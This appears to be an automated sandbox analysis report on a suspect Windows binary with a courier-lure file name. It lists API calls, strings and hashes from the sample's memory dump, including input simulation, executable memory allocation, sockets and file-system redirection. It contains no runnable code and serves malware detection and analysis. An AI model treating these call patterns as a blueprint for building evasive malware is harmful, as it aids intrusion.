                                                                                        • __swprintf.LIBCMT ref: 00C12ECD
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C12D66
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 1943609520-557222456
                                                                                        • Opcode ID: 2655cc6165bf5ea1d21f8ed75e4625123d034e60ade0aab86770a4c77a07a243
                                                                                        • Instruction ID: 7bf071bf0112d5e773e1bba2351ad0913ea4bfb6a0fce93c866922fe19af88ea
                                                                                        • Opcode Fuzzy Hash: 2655cc6165bf5ea1d21f8ed75e4625123d034e60ade0aab86770a4c77a07a243
                                                                                        • Instruction Fuzzy Hash: 169180755083159FCB14EF24D885CAFB7A8FF86710F00491DF4959B2A2DA30EE85EB52
                                                                                        APIs
                                                                                          • Part of subcall function 00C04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C04743,?,?,00C037AE,?), ref: 00C04770
                                                                                        • CoInitialize.OLE32(00000000), ref: 00C6B9BB
                                                                                        • CoCreateInstance.OLE32(00C92D6C,00000000,00000001,00C92BDC,?), ref: 00C6B9D4
                                                                                        • CoUninitialize.OLE32 ref: 00C6B9F1
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2126378814-24824748
                                                                                        • Opcode ID: 0f588c404f344f7f44417ea21e68d06cae178229301285b366c9f356b03c593f
                                                                                        • Instruction ID: 6d9081c4b350f9d481fb613b30f81edbefcef09787aed2a6d2e7cc89520d5307
                                                                                        • Opcode Fuzzy Hash: 0f588c404f344f7f44417ea21e68d06cae178229301285b366c9f356b03c593f
                                                                                        • Instruction Fuzzy Hash: 0DA11A756043059FCB14DF14C484E5ABBE5FF89314F148998F8A99B3A2CB31ED86CB91
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00C250AD
                                                                                          • Part of subcall function 00C300F0: __87except.LIBCMT ref: 00C3012B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        • Opcode ID: 0d83b692dc46e5016bf67ff965188b3a947238420f168a842e122a0263f870a9
                                                                                        • Instruction ID: 5ae17748e1ae4c12a082581f5652851c28c43c819a11a5f18a1f8445f8983681
                                                                                        • Opcode Fuzzy Hash: 0d83b692dc46e5016bf67ff965188b3a947238420f168a842e122a0263f870a9
                                                                                        • Instruction Fuzzy Hash: A951AE72A2C60286DB11B724ED2537F3B90AB00700F308D59E4E5866A9DF358FD4EB82
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$_memmove
                                                                                        • String ID: ERCP
                                                                                        • API String ID: 2532777613-1384759551
                                                                                        • Opcode ID: be64f6293af4e1cfddb795155818ef66e4768b73a751cc009c406546bf78219a
                                                                                        • Instruction ID: 5c10c8008a5636badd33f83002a97ef3ddf1d8b26ed099790b76c2662106a8de
                                                                                        • Opcode Fuzzy Hash: be64f6293af4e1cfddb795155818ef66e4768b73a751cc009c406546bf78219a
                                                                                        • Instruction Fuzzy Hash: B251BF71A00705DBDB24CFA5C981BEAB7F4EF05305F20856EE95ADB251E770EA84DB40
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C8F910,00000000,?,?,?,?), ref: 00C879DF
                                                                                        • GetWindowLongW.USER32 ref: 00C879FC
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C87A0C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long
                                                                                        • String ID: SysTreeView32
                                                                                        • API String ID: 847901565-1698111956
                                                                                        • Opcode ID: 6542fbe9015a14e48765cdbb49b127658fd5228e286b13cf9e83d64b548c2556
                                                                                        • Instruction ID: 048c89f87ae92daed8eb74730132ec177f6160af06d50ab253187beff71e5cf4
                                                                                        • Opcode Fuzzy Hash: 6542fbe9015a14e48765cdbb49b127658fd5228e286b13cf9e83d64b548c2556
                                                                                        • Instruction Fuzzy Hash: 7731E331204205ABDB159F34DC45BEB77A9FB05328F204725F875A31E0E730ED519754
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C87461
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C87475
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C87499
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: 804885d708e267bf0dd6192f6cbb2d6b9e3b52d46cb162b92e5e7073f65154b5
                                                                                        • Instruction ID: 0d550082222da73ce9c68228ca7c60448834c18442cac8064382a77bbd8f841c
                                                                                        • Opcode Fuzzy Hash: 804885d708e267bf0dd6192f6cbb2d6b9e3b52d46cb162b92e5e7073f65154b5
                                                                                        • Instruction Fuzzy Hash: 66219132500218BBDF11DF94CC46FEA3B69EB88728F210214FE156B1D0EA75EC91DBA4
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C87C4A
                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C87C58
                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C87C5F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 4014797782-2298589950
                                                                                        • Opcode ID: 02bdfd0b92753dbcc10df79574e75aa87c4e95e4484d97bf3c75c907f762139f
                                                                                        • Instruction ID: c611a0467992295a6a1f7625b318544aeff5793d36d3bb0ecb04943727d0add4
                                                                                        • Opcode Fuzzy Hash: 02bdfd0b92753dbcc10df79574e75aa87c4e95e4484d97bf3c75c907f762139f
                                                                                        • Instruction Fuzzy Hash: DC218EB5604208AFDB10EF24DCC1EAB77EDEF49358B240159FA119B3A1DB71EC419B64
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C86D3B
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C86D4B
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C86D70
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00C58C6D
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C58C84
• SendMessageW.USER32(?,0000000D,?,00000000), ref: 00C58CBC
Strings
Similarity
• API ID: MessageSend
• String ID: @U=u
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C87772
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C87787
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C87794
Strings
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 00C869A2
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C869B1
Strings
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: @U=u$edit
APIs
  • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
  • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C58E73
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: @U=u$ComboBox$ListBox
APIs
  • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
  • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00C58D6B
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: @U=u$ComboBox$ListBox
APIs
  • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
  • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00C58DEE
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: @U=u$ComboBox$ListBox
APIs
• GetForegroundWindow.USER32(?,00CC57B0,00C8D809,000000FC,?,00000000,00000000,?,?,?,00C3B969,?,?,?,?,?), ref: 00C8ACD1
• GetFocus.USER32 ref: 00C8ACD9
  • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
  • Part of subcall function 00C025DB: GetWindowLongW.USER32(?,000000EB), ref: 00C025EC
• SendMessageW.USER32(013BFD88,000000B0,000001BC,000001C0), ref: 00C8AD4B
Strings
Similarity
• API ID: Window$Long$FocusForegroundMessageSend
• String ID: @U=u
APIs
  • Part of subcall function 00C1603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C16051
• SendMessageW.USER32(?,0000000C,00000000,?), ref: 00C1607F
• GetParent.USER32(?), ref: 00C50D46
• InvalidateRect.USER32(00000000,?,00C13A4F,?,00000000,00000001), ref: 00C50D4D
Strings
Similarity
• API ID: MessageSend$InvalidateParentRectTimeout
• String ID: @U=u
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00C04BD0,?,00C04DEF,?,00CC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C04C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C04C23
Strings
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-3689287502
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00C04B83,?), ref: 00C04C44
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C04C56
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-1355242751
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00C81039), ref: 00C80DF5
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C80E07
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C78CF4,?,00C8F910), ref: 00C790EE
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C79100
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 2574300362-199464113
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00C7E0BE
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00C7E101
                                                                                          • Part of subcall function 00C7D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C7D7C5
                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C7E301
                                                                                        • _memmove.LIBCMT ref: 00C7E314
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3659485706-0
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00C780C3
                                                                                        • CoUninitialize.OLE32 ref: 00C780CE
                                                                                          • Part of subcall function 00C5D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C5D5D4
                                                                                        • VariantInit.OLEAUT32(?), ref: 00C780D9
                                                                                        • VariantClear.OLEAUT32(?), ref: 00C783AA
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 780911581-0
                                                                                        APIs
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C92C7C,?), ref: 00C576EA
                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C92C7C,?), ref: 00C57702
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00C8FB80,000000FF,?,00000000,00000800,00000000,?,00C92C7C,?), ref: 00C57727
                                                                                        • _memcmp.LIBCMT ref: 00C57748
                                                                                        Similarity
                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 314563124-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • String ID:
                                                                                        • API String ID: 2808897238-0
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00C769D1
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C769E1
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C76A45
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C76A51
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                                                        • String ID:
                                                                                        • API String ID: 2214342067-0

APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C8F910), ref: 00C764A7
• _strlen.LIBCMT ref: 00C764D9
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0

APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C6B89E
• GetLastError.KERNEL32(?,00000000), ref: 00C6B8C4
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C6B8E9
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C6B915
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0

APIs
• ClientToScreen.USER32(?,?), ref: 00C8AB60
• GetWindowRect.USER32(?,?), ref: 00C8ABD6
• PtInRect.USER32(?,?,00C8C014), ref: 00C8ABE6
• MessageBeep.USER32(00000000), ref: 00C8AC57
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0

APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C60B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00C60B43
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C60BA9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C60BFB
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0

APIs
• GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00C60C66
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00C60C82
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00C60CE1
• SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00C60D33
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C361FB
• __isleadbyte_l.LIBCMT ref: 00C36229
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C36257
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C3628D
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0

APIs
• GetForegroundWindow.USER32 ref: 00C84F02
  • Part of subcall function 00C63641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C6365B
  • Part of subcall function 00C63641: GetCurrentThreadId.KERNEL32 ref: 00C63662
  • Part of subcall function 00C63641: AttachThreadInput.USER32(00000000,?,00C65005), ref: 00C63669
• GetCaretPos.USER32(?), ref: 00C84F13
• ClientToScreen.USER32(00000000,?), ref: 00C84F4E
• GetForegroundWindow.USER32 ref: 00C84F54
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0

APIs
  • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
• GetCursorPos.USER32(?), ref: 00C8C4D2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C3B9AB,?,?,?,?,?), ref: 00C8C4E7
• GetCursorPos.USER32(?), ref: 00C8C534
